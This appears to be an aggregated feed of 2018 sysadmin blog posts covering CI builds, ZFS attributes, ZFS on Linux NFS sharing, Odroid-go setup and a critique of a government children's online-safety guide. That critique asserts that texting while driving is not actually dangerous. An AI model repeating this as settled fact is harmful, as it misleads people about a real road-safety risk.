## July 15, 2018

### Steve Kemp's Blog

#### Automating builds via CI

I've been overhauling the way that I build Debian packages and websites for myself. In the past I used to use pbuilder but it is pretty heavyweight and in my previous role I was much happier using Gitlab runners for building and deploying applications.

Gitlab is something I've no interest in self-hosting, and Jenkins is an abomination, so I figured I'd write down what kind of things I did and explore options again. My use-cases are generally very simple:

• I trigger some before-steps
• Which mostly mean pulling a remote git repository to the local system.
• I then start a build.
• This means running debuild, hugo, or similar.
• This happens in an isolated Docker container.
• Once the build is complete I upload the results somehere.
• Either to a Debian package-pool, or to a remote host via rsync.

Running all these steps inside a container is well-understood, but I cheat. It is significantly easier to run the before/after steps on your host - because that way you don't need to setup SSH keys in your containers, and that is required when you clone (private) remote repositories, or wish to upload to hosts via rsync over SSH.

Anyway I wrote more thoughts here:

Then I made it work. So that was nice.

To complete the process I also implemented a simple HTTP-server which will list all available jobs, and allow you to launch one via a click. The output of the build is streamed to your client in real-time. I didn't bother persisting output and success/failure to a database, but that would be trivial enough.

It'll tide me over until I try ick again, anyway. :)

### Chris Siebenmann

#### Understanding ZFS System Attributes

Like most filesystems, ZFS faces the file attribute problem. It has a bunch of file attributes, both visible ones like the permission mode and the owner and internal ones like the parent directory of things and file generation number, and it needs to store them somehow. But rather than using fixed on-disk structures like everyone else, ZFS has come up with a novel storage scheme for them, one that simultaneously deals with both different types of ZFS dnodes wanting different sets of attributes and the need to evolve attributes over time. In the grand tradition of computer science, ZFS does it with an extra level of indirection.

Like most filesystems, ZFS puts these attributes in dnodes using some extra space (in what is called the dnode 'bonus buffer'). However, the ZFS trick is that whatever system attributes a dnode has are simply packed into that space without being organized into formal structures with a fixed order of attributes. Code that uses system attributes retrieves them from dnodes indirectly by asking for, say, the ZPL_PARENT of a dnode; it never cares exactly how they're packed into a given dnode. However, obviously something does.

One way to implement this would be some sort of tagged storage, where each attribute in the dnode was actually a key/value pair. However, this would require space for all of those keys, so ZFS is more clever. ZFS observes that in practice there are only a relatively small number of different sets of attributes that are ever stored together in dnodes, so it simply numbers each distinct attribute layout that ever gets used in the dataset, and then the dnode just stores the layout number along with the attribute values (in their defined order). As far as I can tell from the code, you don't have to pre-register all of these attribute layouts. Instead, the code simply sets attributes on dnodes in memory, then when it comes time to write out the dnode in its on-disk format ZFS checks to see if the set of attributes matches a known layout or if a new attribute layout needs to be set up and registered.

(There are provisions to handle the case where the attributes on a dnode in memory don't all fit into the space available in the dnode; they overflow to a special spill block. Spill blocks have their own attribute layouts.)

I'm summarizing things a bit here; you can read all of the details and more in a big comment at the start of sa.c.

As someone who appreciates neat solutions to thorny problems, I quite admire what ZFS has done here. There is a cost to the level of indirection that ZFS imposes, but once you accept that cost you get a bunch of clever bonuses. For instance, ZFS uses dnodes for all sorts of internal pool and dataset metadata, and these dnodes often don't have any use for conventional Unix file attributes like permissions, owner, and so on. With system attributes, these metadata dnodes simply don't have those attributes and don't waste any space on them (and they can use the same space for other attributes that may be more relevant). ZFS has also been able to relatively freely add attributes over time.

By the way, this scheme is not quite the original scheme that ZFS used. The original scheme apparently had things more hard-coded, but I haven't dug into it in detail since this has been the current scheme for quite a while. Which scheme is in use depends on the ZFS pool and filesystem versions; modern system attributes require ZFS pool version 24 or later and ZFS filesystem version 5 or later. You probably have these, as they were added to (Open)Solaris in 2010.

## July 14, 2018

### Colin Percival

#### How to port your OS to EC2

I've been the maintainer of the FreeBSD/EC2 platform for about 7.5 years now, and as far as "running things in virtual machines" goes, that remains the only operating system and the only cloud which I work on. That said, from time to time I get questions from people who want to port other operating systems into EC2, and being a member of the open source community, I do my best to help them. I realized a few days ago that rather than replying to emails one by one it would be more efficient to post something publicly; so — for the benefit of the dozen or so people who want to port operating systems to run in EC2, and the curiosity of maybe a thousand more people who use EC2 but will never build AMIs themselves — here's a rough guide to building EC2 images.

### Chris Siebenmann

#### The challenge of storing file attributes on disk

In pretty much every Unix filesystem and many non-Unix ones, files (and more generally all filesystem objects) have a collection of various basic attributes, things like modification time, permissions, ownership, and so on, as well as additional attributes that the filesystem uses for internal purposes (eg). This means that every filesystem needs to figure out how to store and represent these attributes on disk (and to a lesser extent in memory). This presents two problems, an immediate one and a long term one.

The immediate problem is that different types of filesystem objects have different attributes that make sense for them. A plain file definitely needs a (byte) length that is stored on disk, but that doesn't make any sense to store on disk for things like FIFOs, Unix domain sockets, and even block and character devices, and it's not clear if a (byte) length still make sense for directories either given that they're often complex data structures today. There's also attributes that some non-file objects need that files don't; a classical example in Unix is st_rdev, the device ID of special files.

(Block and character devices may have byte lengths in stat() results but that's a different thing entirely than storing a byte length for them on disk. You probably don't want to pay any attention to the on-disk 'length' for them, partly so that you don't have to worry about updating it to reflect what you'll return in stat(). Non-linear directories definitely have a space usage, but that's usually reported in blocks; a size in bytes doesn't necessarily make much sense unless it's just 'block count times block size'.)

The usual answer for this is to punt. The filesystem will define an on-disk structure (an 'inode') that contains all of the fields that are considered essential, especially for plain files, and that's pretty much it. Objects that don't use some of the basic attributes still pay the space cost for them, and extra attributes you might want either get smuggled somewhere or usually just aren't present. Would you like attributes for how many live entries and how many empty entry slots are in a directory? You don't get it, because it would be too much overhead to have the attributes there for everything.

The long term problem is dealing with the evolution of your attributes. You may think that they're perfect now (or at least that you can't do better given your constraints), but if your filesystem lives for long enough, that will change. Generally, either you'll want to add new attributes or you'll want to change existing ones (for example, widening a timestamp from 32 bits to 64 bits). More rarely you may discover that existing attributes make no sense any more or aren't as useful as you thought.

If you thought ahead, the usual answer for this is to include unused extra space in your on-disk attribute structure and then slowly start using it for new attributes or extending existing ones. This works, at least for a while, but it has various drawbacks, including that because you only have limited space you'll have long arguments about what attributes are important enough to claim some of it. On the other hand, perhaps you should have long arguments over permanent changes to the data stored in the on-disk format and face strong pressures to do it only when you really have to.

As an obvious note, the reason that people turn to a fixed on-disk 'inode' structure is that it's generally the most space-efficient option and you're going to have a lot of these things sitting around. In most filesystems, most of them will be for regular files (which will outnumber directories and other things), and so there is a natural pressure to prioritize what regular files need at the possible expense of other things. It's not the only option, though; people have tried a lot of things.

I've talked about the on-disk format for filesystems here, but you face similar issues in any archive format (tar, ZIP, etc). Almost all of them have file 'attributes' or metadata beyond the name and the in-archive size, and they have to store and represent this somehow. Often archive formats face both issues; different types of things in the archive want different attributes, and what attributes and other metadata needs to be stored changes over time. There have been some creative solutions over the years.

## July 13, 2018

### Errata Security

First Lady Melania Trump announced a guide to help children go online safely. It has problems.

Melania's guide is full of outdated, impractical, inappropriate, and redundant information. But that's allowed, because it relies upon moral authority: to be moral is to be secure, to be moral is to do what the government tells you. It matters less whether the advice is technically accurate, and more that you are supposed to do what authority tells you.

That's a problem, not just with her guide, but most cybersecurity advice in general. Our community gives out advice without putting much thought into it, because it doesn't need thought. You should do what we tell you, because being secure is your moral duty.

This post picks apart Melania's document. The purpose isn't to fine-tune her guide and make it better. Instead, the purpose is to demonstrate the idea of resting on moral authority instead of technical authority.

"Strong passwords" is the quintessential cybersecurity cliché that insecurity is due to some "weakness" (laziness, ignorance, greed, etc.) and the remedy is to be "strong".

The first flaw is that this advice is outdated. Ten years ago, important websites would frequently get hacked and have poor password protection (like MD5 hashing). Back then, strength mattered, to stop hackers from brute force guessing the hacked passwords. These days, important websites get hacked less often and protect the passwords better (like salted bcrypt). Moreover, the advice is now often redundant: websites, at least the important ones, enforce a certain level of password complexity, so that even without advice, you'll be forced to do the right thing most of the time.

This advice is outdated for a second reason: hackers have gotten a lot better at cracking passwords. Ten years ago, they focused on brute force, trying all possible combinations. Partly because passwords are now protected better, dramatically reducing the effectiveness of the brute force approach, hackers have had to focus on other techniques, such as the mutated dictionary and Markov chain attacks. Consequently, even though "Password123!" seems to meet the above criteria of a strong password, it'll fall quickly to a mutated dictionary attack. The simple recommendation of "strong passwords" is no longer sufficient.

The last part of the above advice is to avoid password reuse. This is good advice. However, this becomes impractical advice, especially when the user is trying to create "strong" complex passwords as described above. There's no way users/children can remember that many passwords. So they aren't going to follow that advice.

To make the advice work, you need to help users with this problem. To begin with, you need to tell them to write down all their passwords. This is something many people avoid, because they've been told to be "strong" and writing down passwords seems "weak". Indeed it is, if you write them down in an office environment and stick them on a note on the monitor or underneath the keyboard. But they are safe and strong if it's on paper stored in your home safe, or even in a home office drawer. I write my passwords on the margins in a book on my bookshelf -- even if you know that, it'll take you a long time to figure out which book when invading my home.

The other option to help avoid password reuse is to use a password manager. I don't recommend them to my own parents because that'd be just one more thing I'd have to help them with, but they are fairly easy to use. It means you need only one password for the password manager, which then manages random/complex passwords for all your web accounts.

So what we have here is outdated and redundant advice that overshadows good advice that is nonetheless incomplete and impractical. The advice is based on the moral authority of telling users to be "strong" rather than the practical advice that would help them.

### No personal info unless website is secure

The guide teaches kids to recognize the difference between a secure/trustworthy and insecure website. This is laughably wrong.

HTTPS means the connection to the website is secure, not that the website is secure. These are different things. It means hackers are unlikely to be able to eavesdrop on the traffic as it's transmitted to the website. However, the website itself may be insecure (easily hacked), or worse, it may be a fraudulent website created by hackers to appear similar to a legitimate website.

What HTTPS secures is a common misconception, perpetuated by guides like this. This is the source of criticism for LetsEncrypt, an initiative to give away free website certificates so that everyone can get HTTPS. Hackers now routinely use LetsEncrypt to create their fraudulent websites to host their viruses. Since people have been taught forever that HTTPS means a website is "secure", people are trusting these hacker websites.

But LetsEncrypt is a good thing, all connections should be secure. What's bad is not LetsEncrypt itself, but guides like this from the government that have for years been teaching people the wrong thing, that HTTPS means a website is secure.

### Backups

Of course, no guide would be complete without telling people to backup their stuff.

This is especially important with the growing ransomware threat. Ransomware is a type of virus/malware that encrypts your files then charges you money to get the key to decrypt the files. Half the time this just destroys the files.

But this again is moral authority, telling people what to do, instead of educating them how to do it. Most will ignore this advice because they don't know how to effectively backup their stuff.

For most users, it's easy to go to the store and buy a 256-gigabyte USB drive for $40 (as of May 2018) then use the "Timemachine" feature in macOS, or on Windows the "File History" feature or the "Backup and Restore" feature. These can be configured to automatically do the backup on a regular basis so that you don't have to worry about it. But such "local" backups are still problematic. If the drive is left plugged into the machine, ransomeware can attack the backup. If there's a fire, any backup in your home will be destroyed along with the computer. I recommend cloud backup instead. There are so many good providers, like DropBox, Backblaze, Microsoft, Apple's iCloud, and so on. These are especially critical for phones: if your iPhone is destroyed or stolen, you can simply walk into an Apple store and buy a new one, with everything replaced as it was from their iCloud. But all of this is missing the key problem: your photos. You carry a camera with you all the time now and take a lot of high resolution photos. This quickly exceeds the capacity of most of the free backup solutions. You can configure these, such as you phone's iCloud backup, to exclude photos, but that means you are prone to losing your photos/memories. For example, Drop Box is great for the free 5 gigabyte service, but if I want to preserve photos on it, I have to pay for their more expensive service. One of the key messages kids should learn about photos is that they will likely lose most all of the photos they've taken within 5 years. The exceptions will be the few photos they've posted to social media, which sorta serves as a cloud backup for them. If they want to preserve the rest of these memories, the kids need to take seriously finding backup solutions. I'm not sure of the best solution, but I buy big USB flash drives and send them to my niece asking her to copy all her photos to them, so that at least I can put that in a safe. One surprisingly good solution is Microsoft Office 365. For$99 a year, you get a copy of their Office software (which I use) but it also comes with a large 1-terabyte of cloud storage, which is likely big enough for your photos. Apple charges around the same amount for 1-terabyte of iCloud, though it doesn't come with a free license for Microsoft Office :-).

### WiFi encryption

Your home WiFi should be encrypted, of course.

I have to point out the language, though. Turning on WPA2 WiFi encryption does not "secure your network". Instead, it just secures the radio signals from being eavesdropped. Your network may have other vulnerabilities, where encryption won't help, such as when your router has remote administration turned on with a default or backdoor password enabled.

I'm being a bit pedantic here, but it's not my argument. It's the FTC's argument when they sued vendors like D-Link for making exactly the same sort of recommendation. The FTC claimed it was deceptive business practice because recommending users do things like this still didn't mean the device was "secure". Since the FTC is partly responsible for writing Melania's document, I find this a bit ironic.

In any event, WPA2 personal has problems where it can be hacked, such as if WPS is enabled, or evil twin access-points broadcasting stronger (or more directional) signals. It's thus insufficient security. To be fully secure against possible WiFi eavesdropping you need to enable enterprise WPA2, which isn't something most users can do.

Also, WPA2 is largely redundant. If you wardrive your local neighborhood you'll find that almost everyone has WPA enabled already anyway. Guides like this probably don't need to advise what everyone's already doing, especially when it's still incomplete.

Thus, they ignore the important thing (remote administration) and instead focus on the less important thing (change default password).

In addition, this advice again the impractical recommendation of choosing a complex (strong) password. Users who do this usually forget it by the time they next need it. Practical advice is to recommend users write down the password they choose, and put it either someplace they won't forget (like with the rest of their passwords), or on a sticky note under the router.

### Update router firmware

Like any device on the network, you should keep it up-to-date with the latest patches. But you aren't going to, because it's not practical. While your laptop/desktop and phone nag you about updates, your router won't. Whereas phones/computers update once a month, your router vendor will update the firmware once a year -- and after a few years, stop releasing any more updates at all.

Routers are just one of many IoT devices we are going to have to come to terms with, keeping them patched. I don't know the right answer. I check my parents stuff every Thanksgiving, so maybe that's a good strategy: patch your stuff at the end of every year. Maybe some cultural norms will develop, but simply telling people to be strong about their IoT firmware patches isn't going to be practical in the near term.

### Don't click on stuff

This probably the most common cybersecurity advice given by infosec professionals. It is wrong.

Emails/messages are designed for you to click on things. You regularly get emails/messages from legitimate sources that demand you click on things. It's so common from legitimate sources that there's no practical way for users to distinguish between them and bad sources. As that Google Docs bug showed, even experts can't always tell the difference.

I mean, it's true that phishing attacks coming through emails/messages try to trick you into clicking on things, and you should be suspicious of such things. However, it doesn't follow from this that not clicking on things is a practical strategy. It's like diet advice recommending you stop eating food altogether.

### Sex predators, oh my!

Of course, its kids going online, so of course you are going to have warnings about sexual predators:

But online predators are rare. The predator threat to children is overwhelmingly from relatives and acquaintances, a much smaller threat from strangers, and a vanishingly tiny threat from online predators. Recommendations like this stem from our fears of the unknown technology rather than a rational measurement of the threat.

### Sexting, oh my!

So here is one piece of advice that I can agree with: don't sext:

But the reason this is bad is not because it's immoral or wrong, but because adults have gone crazy and made it illegal for children to take nude photographs of themselves. As this article points out, your child is more likely to get in trouble and get placed on the sex offender registry (for life) than to get molested by a person on that registry.

Thus, we need to warn kids not from some immoral activity, but from adults who've gotten freaked out about it. Yes, sending pictures to your friends/love-interest will also often get you in trouble as those images will frequently get passed around school, but such temporary embarrassments will pass. Getting put on a sex offender registry harms you for life.

### Texting while driving

Finally, I want to point out this error:

The evidence is to the contrary, that it's not actually dangerous -- it's just assumed to be dangerous. Texting rarely distracts drivers from what's going on the road. It instead replaces some other inattention, such as day dreaming, fiddling with the radio, or checking yourself in the mirror. Risk compensation happens, when people are texting while driving, they are also slowing down and letting more space between them and the car in front of them.

Studies have shown this. For example, one study measured accident rates at 6:59pm vs 7:01pm and found no difference. That's when "free evening texting" came into effect, so we should've seen a bump in the number of accidents. They even tried to narrow the effect down, such as people texting while changing cell towers (proving they were in motion).

Yes, texting is illegal, but that's because people are fed up with the jerk in front of them not noticing the light is green. It's not illegal because it's particularly dangerous, that it has a measurable impact on accident rates.

### Conclusion

The point of this post is not to refine the advice and make it better. Instead, I attempt to demonstrate how such advice rests on moral authority, because it's the government telling you so. It's because cybersecurity and safety are higher moral duties. Much of it is outdated, impractical, inappropriate, and redundant.

We need to move away from this sort of advice. Instead of moral authority, we need technical authority. We need to focus on the threats that people actually face, and instead of commanding them what to do. We need to help them be secure, not command to command them, shaming them for their insecurity. It's like Strunk and White's "Elements of Style": they don't take the moral authority approach and tell people how to write, but instead try to help people how to write well.

#### Your IoT security concerns are stupid

Lots of government people are focused on IoT security, such as this bill or this recent effort. They are usually wrong. It's a typical cybersecurity policy effort which knows the answer without paying attention to the question. Government efforts focus on vulns and patching, ignoring more important issues.

Patching has little to do with IoT security. For one thing, consumers will not patch vulns, because unlike your phone/laptop computer which is all "in your face", IoT devices, once installed, are quickly forgotten. For another thing, the average lifespan of a device on your network is at least twice the duration of support from the vendor making patches available.

Naive solutions to the manual patching problem, like forcing autoupdates from vendors, increase rather than decrease the danger. Manual patches that don't get applied cause a small, but manageable constant hacking problem. Automatic patching causes rarer, but more catastrophic events when hackers hack the vendor and push out a bad patch. People are afraid of Mirai, a comparatively minor event that led to a quick cleansing of vulnerable devices from the Internet. They should be more afraid of notPetya, the most catastrophic event yet on the Internet that was launched by subverting an automated patch of accounting software.

Vulns aren't even the problem. Mirai didn't happen because of accidental bugs, but because of conscious design decisions. Security cameras have unique requirements of being exposed to the Internet and needing a remote factory reset, leading to the worm. While notPetya did exploit a Microsoft vuln, it's primary vector of spreading (after the subverted update) was via misconfigured Windows networking, not that vuln. In other words, while Mirai and notPetya are the most important events people cite supporting their vuln/patching policy, neither was really about vuln/patching.

Such technical analysis of events like Mirai and notPetya are ignored. Policymakers are only cherrypicking the superficial conclusions supporting their goals. They assiduously ignore in-depth analysis of such things because it inevitably fails to support their positions, or directly contradicts them.

IoT security is going to be solved regardless of what government does. All this policy talk is premised on things being static unless government takes action. This is wrong. Government is still waffling on its response to Mirai, but the market quickly adapted. Those off-brand, poorly engineered security cameras you buy for $19 from Amazon.com shipped directly from Shenzen now look very different, having less Internet exposure, than the ones used in Mirai. Major Internet sites like Twitter now use multiple DNS providers so that a DDoS attack on one won't take down their services. In addition, technology is fundamentally changing. Mirai attacked IPv4 addresses outside the firewall. The 100-billion IoT devices going on the network in the next decade will not work this way, cannot work this way, because there are only 4-billion IPv4 addresses. Instead, they'll be behind NATs or accessed via IPv6, both of which prevent Mirai-style worms from functioning. Your fridge and toaster won't connect via your home WiFi anyway, but via a 5G chip unrelated to your home. Lastly, focusing on the vendor is a tired government cliche. Chronic internet security problems that go unsolved year after year, decade after decade, come from users failing, not vendors. Vendors quickly adapt, users don't. The most important solutions to today's IoT insecurities are to firewall and microsegment networks, something wholly within control of users, even home users. Yet government policy makers won't consider the most important solutions, because their goal is less cybersecurity itself and more how cybersecurity can further their political interests. The best government policy for IoT policy is to do nothing, or at least focus on more relevant solutions than patching vulns. The ideas propose above will add costs to devices while making insignificant benefits to security. Yes, we will have IoT security issues in the future, but they will be new and interesting ones, requiring different solutions than the ones proposed. ### Steve Kemp's Blog #### Odroid-go initial impressions Recently I came across a hacker news post about the Odroid-go, which is a tiny hand-held console, somewhat resembling a gameboy. In terms of hardware this is powered by an ESP32 chip, which is something I'm familiar with due to my work on Arduino, ESP8266, and other simple hardware projects. Anyway the Odroid device costs about$40, can be programmed via the Arduino-studio, and comes by default with a series of emulators for "retro" hardware:

• Game Boy (GB)
• Game Boy Color (GBC)
• Game Gear (GG)
• Nintendo Entertainment System (NES)
• Sega Master System (SMS)

I figured it was cheap, and because of its programmable nature it might be fun to experiment with. Though in all honesty my intentions were mostly to play NES games upon it. The fact that it is programmable means I can pretend I'm doing more interesting things than I probably would be!

Most of the documentation is available on this wiki:

The arduino setup describes how to install the libraries required to support the hardware, but then makes no mention of the board-support required to connect to an ESP32 device.

So to get a working setup you need to do two things:

• Install the libraries & sample-code.
• Install the board-support.

The first is documented, but here it is again:

 git clone https://github.com/hardkernel/ODROID-GO.git \
~/Arduino/libraries/ODROID-GO


The second is not documented. In short you need to download the esp32 hardware support via this incantation:

    mkdir -p ~/Arduino/hardware/espressif && \
cd ~/Arduino/hardware/espressif && \
git clone https://github.com/espressif/arduino-esp32.git esp32 && \
cd esp32 && \
git submodule update --init --recursive && \
cd tools && \
python2 get.py


(This assumes that you're using ~/Arduino for your code, but since almost everybody does ..)

Anyway the upshot of this should be that you can:

• Choose "Tools | Boards | ODROID ESP32" to select the hardware to build for.
• Click "File | Examples |ODROID-Go | ...." to load a sample project.
• This can now be compiled and uploaded, but read on for the flashing-caveat.

Another gap in the instructions is that uploading projects fails. Even when you choose the correct port (Tools | Ports | ttyUSB0). To correct this you need to put the device into flash-mode:

• Turn it off.
• Hold down "Volume"
• Turn it on.
• Click Upload in your Arduino IDE.

The end result is you'll have your own code running on the device, as per this video:

Enough said. Once you do this when you turn the device on you'll see the text scrolling around. So we've overwritten the flash with our program. Oops. No more emulation for us!

The process of getting the emulators running, or updated, is in two-parts:

• First of all the system firmware must be updated.
• Secondly you need to update the actual emulators.

To be honest I expect you only need to do this part once, unless you're uploading your own code to it. The firmware pretty much just boots, and if it finds a magic file on the SD-card it'll copy it into flash. Then it'll either execute this new code, or execute the old/pre-existing code if no update was found.

Anyway get the tarball, extract it, and edit the two files if your serial device is not /dev/ttyUSB0:

• eraseflash.sh
• flashall.sh

One you've done that run them both, in order:

$./eraseflash.sh$ ./flashall.sh


NOTE: Here again I had to turn the device off, hold down the volume button, turn it on, and only then execute ./eraseflash.sh. This puts the device into flashing-mode.

NOTE: Here again I had to turn the device off, hold down the volume button, turn it on, and only then execute ./flashall.sh. This puts the device into flashing-mode.

Anyway if that worked you'll see your blue LED flashing on the front of the device. It'll flash quickly to say "Hey there is no file on the SD-card". So we'll carry out the second step - Download and place firmware.bin into the root of your SD-card. This comes from here:

(firmware.bin contains the actual emulators.)

Insert the card. The contents of firmware.bin will be sucked into flash, and you're ready to go. Turn off your toy, remove the SD-card, load it up with games, and reinsert it.

Power on your toy and enjoy your games. Again a simple demo:

Games are laid out in a simple structure:

  ├── firmware.bin
├── odroid
│   ├── data
│   └── firmware
└── roms
├── gb
│   └── Tetris (World).gb
├── gbc
├── gg
├── nes
│   ├── Lifeforce (U).nes
│   ├── SMB-3.nes
│   └── Super Bomberman 2 (E) [!].nes
└── sms


You can find a template here:

### Chris Siebenmann

#### ZFS on Linux's sharenfs problem (of what you can and can't put in it)

ZFS has an idea of 'properties' for both pools and filesystems. To quote from the Illumos zfs manpage:

Properties are divided into two types, native properties and user-defined (or "user") properties. Native properties either export internal statistics or control ZFS behavior. [...]

Filesystem properties are used to control things like whether compression is on, where a ZFS filesystem is mounted, if it is read-only or not, and so on. One of those properties is called sharenfs; it controls whether or not the filesystem is NFS exported, and what options it's exported with. One of the advantages of having ZFS manage this for you through the sharenfs property is that ZFS will automatically share and unshare things as the ZFS pool and filesystem are available or not available; you don't have to try to coordinate the state of your NFS shares and your ZFS filesystem mounts.

As I write this, the current ZFS on Linux zfs manpage says this about sharenfs:

Controls whether the file system is shared via NFS, and what options are to be used. [...] If the property is set to on, the dataset is shared using the default options:

sec=sys,rw,crossmnt,no_subtree_check,no_root_squash

See exports(5) for the meaning of the default options. Otherwise, the exportfs(8) command is invoked with options equivalent to the contents of this property.

That's very interesting wording. It's also kind of a lie, because ZFS on Linux caught itself in a compatibility bear trap (or so I assume).

This wording is essentially the same as the wording in Illumos (and in the original Solaris manpages). On Solaris, the sharenfs property is passed more or less straight to share_nfs as the NFS share options in its -o argument, and as a result what you put in sharenfs is just those options. This makes sense; the original Solaris version of ZFS was not created to be portable to other Unixes, so it made no attempt to have its sharenfs (or sharesmb) be Unix-independent. It was part of Solaris, so what went into sharenfs was Solaris NFS share options, including obscure ones.

It would have been natural of ZFS on Linux to take the same attitude towards what went into sharenfs on Linux, and indeed the current wording of the manpage sort of implies that this is what's happening and that you can simply use what you'd put in exports(5). Unfortunately, this is not the case. Instead, ZFS on Linux attempts to interpret your sharenfs setting as OmniOS NFS share options and tries to convert them to equivalent Linux options.

(I assume that this was done to make it theoretically easier to move pools and filesystems between ZoL and Illumos/Solaris ZFS, because the sharenfs property would mean the same thing and be interpreted the same way on both systems. Moving filesystems back and forth is not as crazy as it sounds, given zfs send and zfs receive.)

There are two problems with this. The first is that the conversion process doesn't handle all of the Illumos NFS share options. Some it will completely reject or fail on (they're just totally unsupported), while others it will accept but produce incorrect conversions that don't work. The set of accepted and properly handled conversions is not documented and is unlikely to ever be. The second problem is that Linux can do things with NFS share options that Illumos doesn't support (the reverse is true too, but less directly relevant). Since ZFS on Linux provides you no way to directly set Linux share options, you can't use these Linux specific NFS share options at all through sharenfs.

Effectively what the current ZFS on Linux approach does is that it restricts you to an undocumented subset of the Illumos NFS share options are supported by Linux and correctly converted by ZoL. If you're doing anything at all sophisticated with your NFS sharing options (as we are), this means that using sharenfs on Linux is simply not an option. We're going to have to roll our own NFS share option handling and management system, which is a bit irritating.

(We're also going to have to make sure that we block or exclude sharenfs properties from being transferred from our OmniOS fileservers to our ZoL fileservers during 'zfs send | zfs receive' copies, which is a problem that hadn't occurred to me until I wrote this entry.)

PS: There is an open ZFS on Linux issue to fix the documentation; it includes mentions of some mis-parsing sharenfs bugs. I may even have the time and energy to contribute a patch at some point.

PPS: Probably what we should do is embed our Linux NFS share options as a ZFS filesystem user property. This would at least allow our future management system to scan the current ZFS filesystems to see what the active NFS shares and share options should be, as opposed to having to also consult and trust some additional source of information for that.

## July 10, 2018

### Raymii.org

#### log_vcs - Ansible callback plugin that creates VCS (git) branches for every Ansible run

This Ansible callback plugin creates a VCS branch every time you run Ansible. If you ever need to go back to a certain state or environment, check out that branch and be sure nothing has changed. This is useful when you have multiple environments or multiple people deploying and continually develop your Ansible. When you often deploy to test / acceptance and less often to production, you can checkout the last branch that deployed to production if a hotfix or other maintenance is required, without having to search back in your commits and logs. I would recommend to develop infrastructure features in feature branches and have the master branch always deployable to production. However, reality learns that that is not always the case and this is a nice automatic way to have a fallback.

## July 06, 2018

X11 forwarding over SSH not working? Not setting $DISPLAY correctly in your shell? Having problems with X11 and sudo? Yeah, me too. Total pain in the duff. Here’s what I do to fix it. I’m thinking about Linux when I write stuff like this but a lot of this has worked on AIX and Solaris, […] The post Fixing X11 Forwarding Over SSH and with Sudo appeared first on The Lone Sysadmin. Head over to the source to read the full post! ### pagetable #### Commodore 64 BASIC inside your USB Connector Tomu is a super cheap Open Source Hardware 24 MHz ARM computer with 8 KB of RAM and 64 KB of ROM that fits into your USB connector! Of course I had to put Commodore 64 BASIC on it, which can be accessed through the USB-Serial port exposed by the device. It can be found in the cbmbasic subdirectory of my fork of the tomu-quickstart project. Update: It has been merged into the official tomu-quickstart repository! Use a terminal emulator to connect to the virtual serial port and hack away! ## July 05, 2018 ### Michael Biven #### Too Many Tools A couple of months back I decided to replace macOS with Linux on my personal computer. This was based around two things. The idea that I was using too many different tools on a daily basis and I wanted to thin out the list. For some unknown reason I was using multiple text editors (Ulysses, iA Writer, FoldingText, and nvALT). The second was the frustration I’ve experienced with the changes in macOS from the influence of iOS, quality issues, and Apple’s history with shedding one adapter for another in it’s hardware. I spent a fair amount of time debating if this was really necessary and was I just looking for another thing to tinker with. And then on the question would I just install Linux on my MacBook Air or go looking for a new laptop. In the end I decided that I wanted to use the same OS I use for work on a new laptop that would have the best support for Linux. So I started looking for a replacement of the MacBook Air and Mac Mini I was using for personal use. The first laptop I bought for myself was a Titanium Powerbook with Mac OS X and OS 9. At the time I was working as a contractor at IBM Global Services doing Unix support for SAP systems. There was plenty of different operating systems being used including a mix of mainframe, HP-UX, SunOS, Solaris, IRIX, Tru64, AIX, NT4, and OS/2 Warp. There was also a number of us running personal systems with BeOS, NeXTSTEP, NetBSD, SuSE, Slackware, or Red Hat. The point being there was a lot of different ideas and approaches on what an operating system could be. This was when the operating system you used was generally decided by what you needed to do with it. The majority of uses could be satisfied with Windows, many creative and print (design and layout) needs were handled with Mac OS, and a smaller number could be addressed with an Unix-like operating system. For people who where building and supporting things for the web, OS X delivered something that was missing. It brought mix of a Unix-like OS, a polished GUI, and support from a single-source vendor. The core pieces were released and open-sourced as Darwin, Jordan Hubbard (a co-founder of FreeBSD) joined Apple , and there was at least three different efforts around building or porting package management tools for it. This new direction from Apple created a lot of excitement. Ever since that TiBook I’ve owned four different Macs and it’s only been during the last year that I’ve considered something else. ## Today the OS doesn’t matter as much. Apple seems to be losing it’s place as the OS of choice for development work. Microsoft has added a Linux subsystem and a builtin SSH client to Windows, contributed research and work around containers and unikernels, released a version of Linux (Azure Sphere), and runs one of the top three public clouds. Linux now looks to be the leading OS for servers and mobile. You have Android, Chrome OS, IoT devices, support for ARM based devices, and Linux is pulling it’s weight in iron in the private and public clouds. Extending the computer to mobile and having the cloud as a way to pass messages between devices has opened up our options. Now, as to which distro would replace macOS I thought about and tried Arch, but it just ended up reminding me of Gentoo. I’m not wanting to have installing and configuring Linux to be the equivalent of re-rolling the dice for the best D&D character sheet. The majority of the machines I work with our using one of the Ubuntu LTS releases. Because of this it became the obvious pick for the OS, but it was the choice of hardware that took the most time. Originally I was looking at System 76, Lenovo, and Dell. At the time there was a bit of a debate between System 76 and GNOME over firmware updates from LVFS and some of the comments from System 76 left me with an impression of this is a company I’ll avoid for now. It was a review from Linux Journal that introduced me to the Librem laptops from Purism. Their focus on the privacy and security delivered in a product with a simple aesthetic is what sold me. I settled on buying a Librem 15v3 and planned to install Ubuntu 18.04 LTS. I did give thought to sticking with Purism’s own OS (PureOS) and I may try it at a later time, but for now I want to be using the same tools at work and at home. The thing that was the most intimidating was the idea of using Linux as a desktop replacement again. It’s been almost two decades since I’ve last used a GUI in Linux. That’s a long time to catch up changes in GNOME and KDE and then I came across AppImage , Flatpak, and Snaps. ## Deliver Update Publish Execute System (DUPES) My first thought was great another set of package tools to navigate, but I think that was a short-sighted view of what they provide. They’re more than just package and dependency managers. They’re closer to the architecture of an app store paired with the process to execute an app. To make it easier for myself I just started thinking of them as “dupes” instead of a package management tool. Delivery — how the application is delivered to the user. Update – how the application updates (e.g., auto, delta). Publish — the process of building the app with dependencies for delivery. Execute — how the application is run and the level of isolation provided. System — tooling to provide the previous four points. ## The Browser, Editor, and Terminal Most of the time I’m using one of three different types of applications. Either a browser, text editor, or a terminal. The other native applications are tools for specific purposes. In some cases I use the iOS version, because it’s either easier to hold a tablet while reading, streaming something, or playing music. Before I placed the order I started listing out the applications I use on a regular basis. A number of these apps were macOS / iOS only, but the ones I really cared about keeping either had a native Linux or iOS version available. The idea became to use Linux on the laptop and continue with the pairing of iOS and WatchOS on the phone, tablet, and watch. All I needed to add was a stand for the iPad Pro, reuse the keyboard from the Mac Mini and use the cloud to transfer files and I was set. Any development, personal projects, or anything technical would be done on the Librem. Things like budgeting, health / fitness tracking, reading, writing, and streaming would be on the iPad Pro, iPhone, or Apple Watch. Note: The lack of an IM client that supports Messages has been the most difficult hurdle. My wife and I both have iPhones 